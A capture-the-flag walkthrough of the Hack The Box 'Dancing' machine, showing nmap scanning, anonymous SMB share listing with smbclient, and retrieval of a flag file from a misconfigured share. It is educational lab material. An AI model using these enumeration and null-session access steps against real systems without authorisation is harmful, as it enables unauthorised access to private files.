Machine: https://app.hackthebox.com/starting-point
---
Dancing is a Windows Starting Point machine built around one of the most common misconfigurations in enterprise environments: an SMB file share with anonymous access enabled. No exploit, no brute force — just knowing which tools to use and understanding why custom shares are more interesting than the default ones Windows always creates.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-15 15:21 UTC
Nmap scan report for $TARGET_IP
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 Microsoft-DS
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time:
| date: 2026-08-15T19:21:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
Ports 139 and 445 confirm SMB is running. Port 5985 is WinRM — useful for lateral movement on other machines, not relevant here. SMB signing is enabled but not required, meaning connections without signing are accepted.
List available shares without supplying a password. The -N flag sends a null session — equivalent to anonymous access:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient -L $TARGET_IP -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
SMB1 disabled -- no workgroup available
ADMIN$, C$, and IPC$ are default administrative shares present on every Windows machine — they require credentials. WorkShares is a custom share with no comment, making it the target.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient //$TARGET_IP/WorkShares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Mar 29 10:22:01 2021
.. D 0 Mon Mar 29 10:22:01 2021
Amy.J D 0 Mon Mar 29 10:03:59 2021
James.P D 0 Thu Jun 3 10:38:03 2021
5114111 blocks of size 4096. 1733480 blocks available
smb: \> cd Amy.J
smb: \Amy.J\> ls
. D 0 Mon Mar 29 10:03:59 2021
.. D 0 Mon Mar 29 10:03:59 2021
worknotes.txt A 57 Mon Mar 29 10:19:37 2021
5114111 blocks of size 4096. 1733480 blocks available
smb: \Amy.J\> cd ..
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 10:38:03 2021
.. D 0 Thu Jun 3 10:38:03 2021
flag.txt A 32 Mon Mar 29 10:26:54 2021
5114111 blocks of size 4096. 1733480 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \James.P\> bye
Inside an smbclient session, navigation uses SMB-native commands — ls, cd, get, put. Standard Linux commands like cat do not work here.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat flag.txt
$FLAG
smbclient -L lists shares. -N sends no password — always try this first on port 445 before assuming credentials are required.ADMIN$, C$, and IPC$ are always present on Windows but rarely accessible without credentials. Custom shares with informal names are where misconfigurations live.ls, cd, get, bye. Standard Linux shell commands do not work within the session.